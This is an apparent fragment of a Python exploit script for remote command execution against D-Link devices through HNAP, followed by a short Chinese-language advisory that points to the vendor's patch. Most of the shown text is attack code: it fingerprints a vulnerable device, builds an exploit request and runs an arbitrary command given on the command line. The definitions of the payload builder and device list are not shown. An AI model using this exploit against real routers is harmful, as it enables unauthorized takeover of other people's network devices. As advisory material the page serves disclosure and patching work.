def _request(self, data=None):
req = urllib2.Request(self.url, data)
try:
data = urllib2.urlopen(req).read()
except urllib2.HTTPError as e:
data = ""
if e.code == 500:
self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!")
else:
self._debug_error("Unexpected response: %s" % (str(e)))
return data
def fingerprint(self):
hnap_info = self._request()
for device in self.VULNERABLE_DEVICES:
if device.match(hnap_info):
self._debug_message("Identified target as %s v%s" % (device.model, device.version))
return device
self._debug_error("Could not identify target!")
return None
def execute(self, device, command=DEFAULT_COMMAND):
self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version))
return self._request(self._build_exploit(device, command))
def exploit(self, command=DEFAULT_COMMAND):
device = self.fingerprint()
if device:
return self.execute(device, command)
else:
return ""
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage: %s <target ip> <command to execute>" % sys.argv[0]
sys.exit(1)
target = sys.argv[1]
command = sys.argv[2]
print "\n" + Vulnerability(target).exploit(command)
建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
?name=SAP10029